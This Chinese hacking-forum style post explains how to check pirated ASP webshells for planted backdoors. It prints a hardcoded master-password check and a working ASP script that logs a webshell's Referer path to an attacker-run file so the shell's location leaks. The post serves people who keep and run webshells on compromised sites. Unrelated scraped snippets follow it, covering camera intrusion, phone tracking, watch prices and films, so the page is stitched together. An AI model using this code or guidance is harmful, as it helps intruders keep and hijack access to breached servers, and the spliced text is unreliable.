我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了 难免有些居心不良的人会在里面加后门。 好不容易拿到个shell又被别人偷走了怎么甘心啊! 所以在下完asp木马后要先检查有没后门, 通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具 解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录 正常的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 加有万能密码的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。 找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了! 下面来找马大多数都喜欢用框架挂马: 找到后删了,到此asp后门就算剔除了! 下面教大家后门的原理: 这是一段收信的asp代码将其保存为1.asp <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close set file=nothing set fs=nothing %> 代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里 上传到空间比如 http://127.0.0.1/1.asp 然后里用 插到asp木马中 那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
互联网发展的今天,网购已经成为了一种生活方式,不只是上班族,还有家庭主妇包括学生都会选择在网上买东西,网上想购买的东西基本都有,还不用去逛实体店,业余的时间就可以购买了,很方便,但是淘宝店铺不只是店主...
本文导读目录: 1、家里安装监控可以被别人控制吗? 2、在知道ID和密码的情况下怎么进入别人的网络视频监控系统 3、别人可以随便登录我的监控设备吗? 4、家用监控摄像头除了自己外别人能看到...
军警宾驰手表价值表价值查询购置销售公司 宾驰手表紫红款什么价 539600/元 清远女眷钟表商业公司 新加坡女式手表暗红版价位 758900/元 镇江空想举商贸公司...
本文目录一览: 1、黑客帝国2:重装上阵高清完整版电影 2、黑客帝国三部曲的片长分别是多少? 3、黑客帝国的三部,分别是多少分钟的电影? 黑客帝国2:重装上阵高清完整版电影 链接: 提取码...
本文目录一览: 1、餐厅后门贴什么字风水好? 2、餐厅玻璃门上面贴什么字好? 3、开个饭店带快餐,窗户和玻璃门上贴什么字好看又好听? 餐厅后门贴什么字风水好? 在我国传统位理学中确有倒贴福字...
手机上追踪定位武器(教你查一个人的部位) 如今外出全部物品都能够没有,唯有手机上不得不带。 手机上手中,天下我有! 手机上看不到,心痛一片 手机被盗的情况下,那觉得便是 天塌了!塌方了!开心快乐不见了...